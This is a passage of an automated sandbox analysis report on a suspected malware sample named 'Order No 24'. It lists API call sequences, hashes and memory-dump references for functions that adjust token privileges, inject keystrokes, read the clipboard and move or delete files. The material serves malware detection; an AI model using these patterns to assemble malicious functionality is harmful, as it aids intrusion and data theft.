                                                                                                                                  • Instruction Fuzzy Hash: F5E0BF7494010DEFDB00EFA4D5496EE7BB4FF04301F1005A1FD05D7681DB309E549A62
                                                                                                                                  Function 01273BB0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 01273BC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                  • Instruction ID: fd00e606e6ed67e37ebfe03a6af86c03a4d2db7a971efadfc0b90bc67d0b1775
                                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                  • Instruction Fuzzy Hash: 5DE0E67494010DDFDB00EFB4D5496AE7FB4FF04301F100561FD01D2281D6309D509A62

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 009EF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 009EF87D
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009EF8DC
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 009EF919
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009EF940
                                                                                                                                  • SendMessageW.USER32 ref: 009EF966
                                                                                                                                  • _wcsncpy.LIBCMT ref: 009EF9D2
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 009EF9F3
                                                                                                                                  • GetKeyState.USER32(00000009), ref: 009EFA00
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009EFA16
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 009EFA20
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009EFA4F
                                                                                                                                  • SendMessageW.USER32 ref: 009EFA72
                                                                                                                                  • SendMessageW.USER32(?,00001030,?,009EE059), ref: 009EFB6F
                                                                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 009EFB85
                                                                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 009EFB96
                                                                                                                                  • SetCapture.USER32(?), ref: 009EFB9F
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 009EFC03
                                                                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009EFC0F
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 009EFC29
                                                                                                                                  • ReleaseCapture.USER32 ref: 009EFC34
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009EFC69
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009EFC76
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 009EFCD8
                                                                                                                                  • SendMessageW.USER32 ref: 009EFD02
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 009EFD41
                                                                                                                                  • SendMessageW.USER32 ref: 009EFD6C
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009EFD84
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 009EFD8F
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009EFDB0
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009EFDBD
                                                                                                                                  • GetParent.USER32(?), ref: 009EFDD9
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 009EFE3F
                                                                                                                                  • SendMessageW.USER32 ref: 009EFE6F
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 009EFEC5
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009EFEF1
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 009EFF19
                                                                                                                                  • SendMessageW.USER32 ref: 009EFF3C
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 009EFF86
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009EFFB6
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 009F004B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                  • API String ID: 2516578528-4164748364
                                                                                                                                  • Opcode ID: 84a0720e687878b804e90c2b0c418b8349bc62d5660d99527164a5425d9b77a2
                                                                                                                                  • Instruction ID: 6031c6fcd36b17e975323f190b2ebc256231c0af7e234d5aa7e734052cb4e973
                                                                                                                                  • Opcode Fuzzy Hash: 84a0720e687878b804e90c2b0c418b8349bc62d5660d99527164a5425d9b77a2
                                                                                                                                  • Instruction Fuzzy Hash: 5432F075604384EFDB12CFA4C894B6ABBA8FF89344F144A2AF695C72A1D731DC42CB51
                                                                                                                                  Function 009EAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 009EB1CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                                  • Opcode ID: 917d50dbaf5beae9c20024b0bfe34a5a9ff054aab172a0142b7986338076acc4
                                                                                                                                  • Instruction ID: d7cf4339e71c658a5ce6c9d2c2199e0bfde5bff523aa2342464dca1452f9ec24
                                                                                                                                  • Opcode Fuzzy Hash: 917d50dbaf5beae9c20024b0bfe34a5a9ff054aab172a0142b7986338076acc4
                                                                                                                                  • Instruction Fuzzy Hash: D412C071500248ABEB269FA6CC49FAF7BB8FF85320F104519F915DA2E1DB749D42CB11
                                                                                                                                  Function 0099EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 0099EB4A
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009F3AEA
                                                                                                                                  • IsIconic.USER32(000000FF), ref: 009F3AF3
                                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 009F3B00
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 009F3B0A
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009F3B20
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009F3B27
                                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 009F3B33
                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009F3B44
                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009F3B4C
                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 009F3B54
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 009F3B57
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B6C
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 009F3B77
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B81
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 009F3B86
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B8F
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 009F3B94
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B9E
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 009F3BA3
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 009F3BA6
                                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 009F3BCD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                                  • Opcode ID: 66703ff2023ffad121d25210d689ecb4e9fdcaf7e55d035ff9a9de774c507bd4
                                                                                                                                  • Instruction ID: 7b3be6d1954baf5b3827b6788919fbffa80ab2cd1c9465b10b97ba4d2c7911c4
                                                                                                                                  • Opcode Fuzzy Hash: 66703ff2023ffad121d25210d689ecb4e9fdcaf7e55d035ff9a9de774c507bd4
                                                                                                                                  • Instruction Fuzzy Hash: 69314572A4021CBFEB215BE59C49F7F7E6CEB44B50F104015FB05EA1D1D6B59D029BA0
                                                                                                                                  Function 009BACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                                                                                                                    • Part of subcall function 009BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                                                                                                                    • Part of subcall function 009BB134: GetLastError.KERNEL32 ref: 009BB1BA
                                                                                                                                  • _memset.LIBCMT ref: 009BAD08
                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009BAD5A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009BAD6B
                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009BAD82
                                                                                                                                  • GetProcessWindowStation.USER32 ref: 009BAD9B
                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 009BADA5
                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009BADBF
                                                                                                                                    • Part of subcall function 009BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009BACC0), ref: 009BAB99
                                                                                                                                    • Part of subcall function 009BAB84: CloseHandle.KERNEL32(?,?,009BACC0), ref: 009BABAB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                  • Opcode ID: 1ed0f534e27334f2960fa6ca0c4459ef25f7eeae41244d302235c90248481b8f
                                                                                                                                  • Instruction ID: d6e06b7488773633147f30beea5a89bfd631881f76136157fc4d927f4f44d864
                                                                                                                                  • Opcode Fuzzy Hash: 1ed0f534e27334f2960fa6ca0c4459ef25f7eeae41244d302235c90248481b8f
                                                                                                                                  • Instruction Fuzzy Hash: C3816B72800209AFEF11DFE4DE49AEEBBBCEF04324F044119F914A61A1D7728E56DB61
                                                                                                                                  Function 009C60DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                                                                                                                    • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C5FA6,?), ref: 009C6EF1
                                                                                                                                    • Part of subcall function 009C725E: __wsplitpath.LIBCMT ref: 009C727B
                                                                                                                                    • Part of subcall function 009C725E: __wsplitpath.LIBCMT ref: 009C728E
                                                                                                                                    • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                                                                                                                  • _wcscat.LIBCMT ref: 009C6149
                                                                                                                                  • _wcscat.LIBCMT ref: 009C6167
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009C618E
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009C61A4
                                                                                                                                  • _wcscpy.LIBCMT ref: 009C6209
                                                                                                                                  • _wcscat.LIBCMT ref: 009C621C
                                                                                                                                  • _wcscat.LIBCMT ref: 009C622F
                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009C625D
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 009C626E
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009C6289
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009C6298
                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 009C62AD
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 009C62BE
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 009C62E1
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009C62FD
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009C630B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                                  • String ID: \*.*$p1#v`K$v
                                                                                                                                  • API String ID: 1917200108-1732502266
                                                                                                                                  • Opcode ID: c96f2b732773e21ad69588e4d6db18c7ac641f575ed25e17df808a7ab8b45e46
                                                                                                                                  • Instruction ID: 7d986afe1317f986c8643e9ac30f6d15dfa37a319432f3f76cef9b19f2b9fc84
                                                                                                                                  • Opcode Fuzzy Hash: c96f2b732773e21ad69588e4d6db18c7ac641f575ed25e17df808a7ab8b45e46
                                                                                                                                  • Instruction Fuzzy Hash: 9C511F72C0811C6ACB21EB95CC44EEFB7BCAF45300F0905EAE595E2141EE36974ACFA5
                                                                                                                                  Function 009D6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenClipboard.USER32(00A1DC00), ref: 009D6B36
                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 009D6B44
                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 009D6B4C
                                                                                                                                  • CloseClipboard.USER32 ref: 009D6B58
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 009D6B74
                                                                                                                                  • CloseClipboard.USER32 ref: 009D6B7E
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 009D6B93
                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 009D6BA0
                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 009D6BA8
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 009D6BB5
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 009D6BE9
                                                                                                                                  • CloseClipboard.USER32 ref: 009D6CF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3222323430-0
                                                                                                                                  • Opcode ID: 15402e3f31fd536b94edeea822d25c07dd4e4db16edf052773184b7e2a6661d2
                                                                                                                                  • Instruction ID: 9bafe0fbb01de3ae504db69cdc33f613ec77182b10f9e533f841aeff1d2f2d7b
                                                                                                                                  • Opcode Fuzzy Hash: 15402e3f31fd536b94edeea822d25c07dd4e4db16edf052773184b7e2a6661d2
                                                                                                                                  • Instruction Fuzzy Hash: 5B519072244205ABD300FFA4DD96F6E77A8AF88B10F00442AF686D62D1DF75D9068B62
                                                                                                                                  Function 009CF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009CF62B
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009CF67F
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CF6A4
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CF6BB
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 009CF6E2
                                                                                                                                  • __swprintf.LIBCMT ref: 009CF72E
                                                                                                                                  • __swprintf.LIBCMT ref: 009CF767
                                                                                                                                  • __swprintf.LIBCMT ref: 009CF7BB
                                                                                                                                    • Part of subcall function 009A172B: __woutput_l.LIBCMT ref: 009A1784
                                                                                                                                  • __swprintf.LIBCMT ref: 009CF809
                                                                                                                                  • __swprintf.LIBCMT ref: 009CF858
                                                                                                                                  • __swprintf.LIBCMT ref: 009CF8A7
                                                                                                                                  • __swprintf.LIBCMT ref: 009CF8F6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                  • API String ID: 835046349-2428617273
                                                                                                                                  • Opcode ID: 7169e5460165ca8b838dd1c0318d92b37f8b37e6cd93a742876cd5a76961a13e
                                                                                                                                  • Instruction ID: 3030244f3bcf8eec397ceb097d2e680005fdf8fb9c3a282b9b6f07b97c2e76a3
                                                                                                                                  • Opcode Fuzzy Hash: 7169e5460165ca8b838dd1c0318d92b37f8b37e6cd93a742876cd5a76961a13e
                                                                                                                                  • Instruction Fuzzy Hash: E8A100B2408344ABC710EFA4C995EAFB7ECAF98704F440D2EF595C2152EB34D949C762
                                                                                                                                  Function 009D1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 009D1B50
                                                                                                                                  • _wcscmp.LIBCMT ref: 009D1B65
                                                                                                                                  • _wcscmp.LIBCMT ref: 009D1B7C
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 009D1B8E
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 009D1BA8
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 009D1BC0
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009D1BCB
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 009D1BE7
                                                                                                                                  • _wcscmp.LIBCMT ref: 009D1C0E
                                                                                                                                  • _wcscmp.LIBCMT ref: 009D1C25
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D1C37
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00A339FC), ref: 009D1C55
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 009D1C5F
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009D1C6C
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009D1C7C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                                  • Opcode ID: 14d757e0e3ba0503e57c02d8329e65e0f69d14f36a409ce4b863dcb67672d115
                                                                                                                                  • Instruction ID: bda6d1c2248e13cb5046cf46814428c8a24eb548b3b6eed2e1860256d907e9b7
                                                                                                                                  • Opcode Fuzzy Hash: 14d757e0e3ba0503e57c02d8329e65e0f69d14f36a409ce4b863dcb67672d115
                                                                                                                                  • Instruction Fuzzy Hash: 49318033A84219BBDF10EBF0DC49BDE77ACAF45324F148557F811E2190EB74DA868A64
                                                                                                                                  Function 009D1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 009D1CAB
                                                                                                                                  • _wcscmp.LIBCMT ref: 009D1CC0
                                                                                                                                  • _wcscmp.LIBCMT ref: 009D1CD7
                                                                                                                                    • Part of subcall function 009C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009C6BEF
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 009D1D06
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009D1D11
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 009D1D2D
                                                                                                                                  • _wcscmp.LIBCMT ref: 009D1D54
                                                                                                                                  • _wcscmp.LIBCMT ref: 009D1D6B
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D1D7D
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00A339FC), ref: 009D1D9B
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 009D1DA5
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009D1DB2
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009D1DC2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
